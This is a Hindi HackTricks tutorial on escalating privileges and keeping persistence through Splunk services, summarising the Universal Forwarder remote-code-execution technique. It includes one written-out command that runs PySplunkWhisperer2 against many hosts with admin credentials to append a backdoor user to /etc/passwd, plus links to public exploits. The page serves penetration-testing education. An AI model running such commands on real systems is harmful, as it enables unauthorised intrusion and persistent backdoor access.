HackTricksSplunk LPE और स्थिरता
tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: 
HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें: 
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
यदि आंतरिक या बाहरी रूप से किसी मशीन का गणना करते समय आपको Splunk चलाते हुए (पोर्ट 8090) मिलता है, और यदि आपको किसी मान्य क्रेडेंशियल का पता है, तो आप Splunk सेवा का दुरुपयोग करके एक शेल को उस उपयोगकर्ता के रूप में निष्पादित कर सकते हैं जो Splunk चला रहा है। यदि रूट इसे चला रहा है, तो आप रूट तक विशेषाधिकार बढ़ा सकते हैं।
यदि आप पहले से ही रूट हैं और Splunk सेवा केवल लोकलहोस्ट पर नहीं सुन रही है, तो आप Splunk सेवा से पासवर्ड फ़ाइल चुरा सकते हैं और पासवर्ड को क्रैक कर सकते हैं, या इसमें नए क्रेडेंशियल जोड़ सकते हैं। और होस्ट पर स्थिरता बनाए रख सकते हैं।
नीचे पहले चित्र में आप देख सकते हैं कि एक Splunkd वेब पृष्ठ कैसा दिखता है।
Splunk यूनिवर्सल फॉरवर्डर एजेंट एक्सप्लॉइट सारांश
अधिक विवरण के लिए पोस्ट देखें https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/. यह केवल एक सारांश है:
एक्सप्लॉइट अवलोकन: एक्सप्लॉइट जो Splunk यूनिवर्सल फॉरवर्डर एजेंट (UF) को लक्षित करता है, हमलावरों को एजेंट पासवर्ड के साथ एजेंट पर चलने वाले सिस्टम पर मनमाना कोड निष्पादित करने की अनुमति देता है, जिससे पूरे नेटवर्क का समझौता हो सकता है।
मुख्य बिंदु:
- UF एजेंट आने वाले कनेक्शनों या कोड की प्रामाणिकता को मान्य नहीं करता है, जिससे यह अनधिकृत कोड निष्पादन के लिए संवेदनशील हो जाता है।
- सामान्य पासवर्ड अधिग्रहण विधियों में उन्हें नेटवर्क निर्देशिकाओं, फ़ाइल शेयरों, या आंतरिक दस्तावेज़ों में ढूंढना शामिल है।
- सफल दुरुपयोग से समझौता किए गए होस्ट पर SYSTEM या रूट स्तर की पहुंच, डेटा निकासी, और आगे के नेटवर्क में घुसपैठ हो सकती है।
एक्सप्लॉइट निष्पादन:
- हमलावर UF एजेंट पासवर्ड प्राप्त करता है।
- एजेंटों को आदेश या स्क्रिप्ट भेजने के लिए Splunk API का उपयोग करता है।
- संभावित क्रियाओं में फ़ाइल निष्कर्षण, उपयोगकर्ता खाता हेरफेर, और सिस्टम का समझौता शामिल है।
प्रभाव:
- प्रत्येक होस्ट पर SYSTEM/रूट स्तर की अनुमतियों के साथ पूर्ण नेटवर्क समझौता।
- पहचान से बचने के लिए लॉगिंग को अक्षम करने की संभावना।
- बैकडोर या रैनसमवेयर की स्थापना।
दुरुपयोग के लिए उदाहरण आदेश:
for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8089 --username admin --password "12345678" --payload "echo 'attacker007:x:1003:1003::/home/:/bin/bash' >> /etc/passwd" --lhost 192.168.42.51;done
उपयोगी सार्वजनिक एक्सप्लॉइट:
- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
- https://www.exploit-db.com/exploits/46238
- https://www.exploit-db.com/exploits/46487
Splunk क्वेरी का दुरुपयोग
अधिक जानकारी के लिए पोस्ट देखें https://blog.hrncirik.net/cve-2023-46214-analysis
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाओं की जांच करें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।